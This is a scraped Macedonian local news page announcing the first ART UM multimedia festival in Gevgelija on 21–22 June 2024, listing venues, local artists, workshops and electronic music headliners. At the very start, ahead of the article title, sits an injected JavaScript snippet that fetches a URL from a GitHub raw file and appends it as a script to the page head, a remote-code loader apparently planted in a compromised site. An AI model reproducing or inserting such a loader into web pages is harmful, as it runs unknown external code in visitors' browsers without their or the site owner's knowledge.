;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Мултимедијален фестивал АРТ УМ во Гевгелија - Антропол
АктуелноЛокално

Мултимедијален фестивал АРТ УМ во Гевгелија

Првото издание на дводневниот мултимедијален фестивал АРТ УМ, ќе се одржи во Гевгелија на 21 и 22 јуни 2024 година.

Овој фестивал ќе вклучува широк спектар на активности, вклучувајќи изложби, работилници, уметнички перформанси и настапи на истакнати домашни и странски изведувачи од електронската музичка сцена.

Локациите за овој настан се Дом на Култура – Гевгелија (21 јуни) и клубот Де Факто (22 јуни). Програмата започнува на 21 јуни со мултимедијална изложба во Домот на Културата, каде што ќе бидат презентирани уметнички дела, инсталации и перформанси од истакнати локални уметници од Гевгелија: Перо Кованцалев, Ице Капсаров, Александар Јанев и Мирјана Крстева Масети. Ќе се одржат кратки работилници, вклучувајќи ја „Генеративна уметност“ од архитект Натали Василева, како и мастер клас на тема „Кратка историја и вовед во електронската музика и основи на аналогна синтеза“ од продуцентот и диџеј Александар Гроздановски (Herzel), кој исто така ќе настапи со музички перформанс.

На 22 јуни фестивалот продолжува со десетчасовен музички дел на два стејџа, кој ќе започне во 22:00 часот и ќе трае до 08:00 часот. Главни хедлајнери ќе бидат етаблирани изведувачи од електронската музичка сцена, како што се Jimpster од Freerange Records, Лондон, UK и Samuel L Session од SLS Records, Гетеборг, Шведска. На овој настан ќе настапат и веќе познати артисти од домашната електронска сцена: Tomi Bojadzi, Maci, Wish.Ko, Samoil Radinski, Soul Case, Berryqat, Joss, и Mosaik Kollektif.